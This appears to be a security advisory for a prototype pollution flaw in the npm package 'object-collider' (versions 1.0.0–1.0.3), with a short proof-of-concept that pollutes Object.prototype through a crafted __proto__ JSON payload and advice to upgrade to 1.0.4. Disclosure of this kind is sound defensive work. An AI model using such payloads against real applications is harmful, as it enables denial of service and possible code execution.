Overview
Prototype pollution vulnerability in 'object-collider' versions 1.0.0 through 1.0.3 allows attacker to cause a denial of service and may lead to remote code execution.
Details
The `collide()` function accepts four arguments. Due to the absence of validation on the values passed into the `args2` argument, an attacker can supply a malicious value by adjusting the value to include the `__proto__` property. Since there is no validation before assigning the property to check whether the assigned argument is the Object's own property or not, the property `polluted` will be directly be assigned to the new object thereby polluting the Object prototype. Later in the code, if there is a check to validate `polluted` the valued would be substituted as "Yes! Its Polluted" as it had been polluted.
PoC Details
The `collide()` function accepts four arguments. Due to the absence of validation on the values passed into the `args2` argument, an attacker can supply a malicious value by adjusting the value to include the `__proto__` property. Since there is no validation before assigning the property here to check whether the assigned argument is the Object's own property or not, the property `polluted` will be directly be assigned to the new object thereby polluting the Object prototype. Later in the code, if there is a check to validate `polluted` the valued would be substituted as "Yes! Its Polluted" as it had been polluted.
PoC Code
var { collide } = require("object-collider")
const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
var obj = {} console.log("Before : " + {}.polluted);
collide(obj, payload);
console.log("After : " + {}.polluted);
Affected Environments
1.0.0-1.0.3
Prevention
Upgrade to version 1.0.4
Vulnerabilities
Projects
Vulnerability Disclosure
About Us
Contact Us
What is a WS vulnerability ID? 
